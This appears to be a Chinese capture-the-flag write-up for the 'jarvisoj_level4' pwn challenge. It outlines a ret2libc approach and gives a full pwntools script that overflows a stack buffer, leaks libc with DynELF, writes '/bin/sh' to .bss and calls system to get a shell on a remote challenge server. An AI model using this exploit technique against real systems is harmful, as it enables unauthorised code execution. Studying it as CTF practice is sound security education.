jarvisoj_level4

1,三连

jarvisoj_level4_第1张图片2,偏移
jarvisoj_level4_第2张图片3,IDA静态查看是否有ret利用点
jarvisoj_level4_第3张图片思路:ret2libc,泄露_write来获取Libc基址
4,ldd查看
在这里插入图片描述

5,payload
自动查Libc版本

#!/usr/bin/env python
# -*- coding: utf-8 -*-

from pwn import *
from time import sleep
import sys
context.binary = "./level4"
elf = context.binary
context.terminal = ["deepin-terminal", "-x", "sh", "-c"]

if sys.argv[1] == "l":
    io = process("./level4")
else:
    io = remote('node4.buuoj.cn',28365)

def leak(addr):
    payload = flat(cyclic(0x88 + 4), elf.plt['write'], elf.sym['_start'], 1, addr, 4)
    io.send(payload)
    sleep(0.01)
    leaked = io.recv(4)
    info("leaked -> {}".format(leaked))
    return leaked

d = DynELF(leak, elf=ELF('./level4'))
system_addr = d.lookup('system', 'libc')
success("system -> {:#x}".format(system_addr))
pause()

#  gdb.attach(io)
payload = flat(cyclic(0x88 + 4), elf.sym['read'], elf.sym['_start'], 0, elf.bss() + 0x500, 8)
io.send(payload)
sleep(0.01)
io.send("/bin/sh\0")
sleep(0.01)

payload = flat(cyclic(0x88 + 4), system_addr, 'aaaa', elf.bss() + 0x500)
io.send(payload)

io.interactive()

你可能感兴趣的:(PWN,pwn)